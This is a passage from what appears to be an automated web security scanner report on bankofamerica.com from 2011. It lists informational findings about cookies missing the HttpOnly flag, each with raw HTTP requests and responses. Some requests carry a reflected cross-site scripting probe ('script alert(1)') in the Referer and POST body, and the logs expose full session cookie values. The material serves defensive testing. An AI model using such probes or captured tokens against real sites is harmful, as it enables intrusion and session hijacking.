TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:58 GMT
Content-type: magnus-internal/cold-fusion
Location: http://feesandprocesses.bankofamerica.com/
Connection: close
Set-Cookie: BIGipServerngen-www.80=969324203.20480.0000; path=/


11.378. http://www.bankofamerica.com/financialtools/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /financialtools/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /financialtools/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:59 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Location: http://learn.bankofamerica.com
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=482784939.20480.0000; path=/


   <!-- i2a business unit tracking code -->
   <script LANGUAGE="JavaScript">
   var ic_bu = "financialtools";
   </script>
   <!-- i2a business unit tracking code -->

   <!-- i2a general tracking code -->
   <sc
...[SNIP]...

11.379. http://www.bankofamerica.com/findit/error.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/error.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /findit/error.cgi HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/vehicle_and_personal_loans544ce%22%3E%3Cscript%3Ealert(1)%3C/script%3E45ae18a6011/index.cfm
Cache-Control: max-age=0
Origin: http://www.bankofamerica.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; CMAVID=none; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; CFID=130174869; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; GEOSERVER=2; BIGipServerngen-www.80=480687787.20480.0000
Content-Length: 152

URL=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E45ae18a6011%2Findex.cfm

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:20 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: BIGipServerngen-www.80=2756032171.20480.0000; path=/
Content-Length: 19150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Plea
...[SNIP]...

11.380. http://www.bankofamerica.com/findit/locator.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/locator.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /findit/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:55 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Location: http://locators.bankofamerica.com/locator/locator
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1455863467.20480.0000; path=/


                                                                           

11.381. http://www.bankofamerica.com/global/images/new_Banklogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/images/new_Banklogo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/images/new_Banklogo.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:39 GMT
Content-length: 24065
Content-type: image/gif
Last-modified: Sun, 25 Oct 2009 17:09:06 GMT
Etag: "5e01-4ae48632"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

......JFIF.....H.H....
.Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:06:30 12:19:11.........
...[SNIP]...

11.382. http://www.bankofamerica.com/global/js/fontsize.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/js/fontsize.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/js/fontsize.js HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/help/equalhousing_popup.cfm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; CMAVID=none; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; CFID=130174869; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; GEOSERVER=2; BIGipServerngen-www.80=960935595.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:51 GMT
Content-length: 3187
Content-type: application/x-javascript
Last-modified: Tue, 16 Sep 2003 00:04:40 GMT
Etag: "c73-3f665398"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=734377643.20480.0000; path=/

var platform     = navigator.platform.toLowerCase();    // Operating system
var userAgent = window.navigator.userAgent; // Browser user agent string

/* Multiple the size of the font for each st
...[SNIP]...

11.383. http://www.bankofamerica.com/global/mvc_objects/images/house.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/house.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/house.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:40 GMT
Content-length: 74
Content-type: image/gif
Last-modified: Fri, 13 Aug 2004 11:39:19 GMT
Etag: "4a-411ca867"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1648801451.20480.0000; path=/

GIF89a..    ..........{{{...,......    ...#.-3r)B.-....-....,.. W6.kr....vZ..;

11.384. http://www.bankofamerica.com/global/mvc_objects/images/list_greybullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/list_greybullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/list_greybullet.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:40 GMT
Content-length: 54
Content-type: image/gif
Last-modified: Sun, 30 Jun 2002 16:31:41 GMT
Etag: "36-3d1f326d"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3041244843.20480.0000; path=/

GIF89a.......LLL...333...!.......,................\..;

11.385. http://www.bankofamerica.com/global/mvc_objects/images/mhd_reg_5x1_lines.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/mhd_reg_5x1_lines.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/mhd_reg_5x1_lines.gif HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:40 GMT
Content-length: 44
Content-type: image/gif
Last-modified: Thu, 17 Jul 2003 17:44:52 GMT
Etag: "2c-3f16e094"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=424064683.20480.0000; path=/

GIF89a.............!.......,...............;

11.386. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/hs2_mvc_content_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_content_style.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/vehicle_and_personal_loans544ce%22%3E%3Cscript%3Ealert(1)%3C/script%3E45ae18a6011/index.cfm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:50 GMT
Content-length: 26359
Content-type: text/css
Last-modified: Sat, 11 Dec 2010 00:36:35 GMT
Etag: "66f7-4d02c793"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1556526763.20480.0000; path=/

/* top level font to cascade */
.standard-font {font-size: 71%; font-family : Verdana, Arial, Geneva, Helvetica, sans-serif;}
.standard-font2 {font-size: 100%; font-family : Verdana, Arial, Geneva, He
...[SNIP]...

11.387. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/help/equalhousing_popup.cfm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; CMAVID=none; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; CFID=130174869; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; GEOSERVER=2; BIGipServerngen-www.80=960935595.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:51 GMT
Content-length: 5907
Content-type: text/css
Last-modified: Sat, 12 Sep 2009 03:49:06 GMT
Etag: "1713-4aab1a32"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/

.body-top-align {margin-left:0em; margin-top:0em; margin-bottom:-.5em; background-color:#FFFFFF;}

/* global link styles */
.td-global-link { padding-top: 0px; padding-bottom: 0px; padding-left: 0px
...[SNIP]...

11.388. http://www.bankofamerica.com/global/mvc_objects/stylesheet/masthead-ns6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/masthead-ns6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/masthead-ns6.css HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21; BIGipServerngen-www.80=480687787.20480.0000

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:14:50 GMT
Content-length: 4187
Content-type: text/css
Last-modified: Sat, 28 Mar 2009 02:14:39 GMT
Etag: "105b-49cd880f"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=2915415723.20480.0000; path=/

body {margin: 0px; padding: 0px;}
.mh-hline {background-color: #ECECEC; background-image: url(/global/mvc_objects/images/mhd_reg_5x1_lines.gif); background-repeat: repeat-x;}
.mh-vline {background-col
...[SNIP]...

11.389. http://www.bankofamerica.com/help/equalhousing.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:17 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1657190059.20480.0000; path=/


                                                                            <html lang="en-us">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="/global/
...[SNIP]...

11.390. http://www.bankofamerica.com/help/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=PsA0HylVqqaqeyp2eMZicNCxJ5yXmFqWoP6mwBuZTOzvqaaTDkSwusUt87wIMt8yw2jjZe2uz0c9qvYWnG5IzjpCeJGlDNniEsMBfj1RLXbnE934lvGx4s6FDAlOpYOeX7mXH/X1dATmjlTEA7peFaYQMTBsGOe3ssml7oOAUfHWD93UMAkbPmp57uTRMf4hzPBfBBVvBqkkkFVyIN5oX1VTt4P79m/dU6MatOqH1bZdlrDN8rr72JAU7eFjp/sazTaPmxrLXFVHkmLtv1jJtCtkOgfV8GmXuScS7bGqbWMI6fOk2xWv/vnB8clClkIqoHDBT+3zh6PtJ5IuXdeLhMy3yziu6VgswrJTq4nnGkT1rSXqeCvUiAnW8lJiQ8/rR+aB7nWeu9z3uJWZxXHr18caM0EqiD/c+SAFaE+DYMjHQ0mbdsgs1FuqeLjIx9STNpx3K2zq/aPEGsqCAelWm4sPN0qbtTsQnF3YWNBTDg0eRBe62pWODGxKIDrwQUkv; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 01:05:16 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Wed, 03-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com;
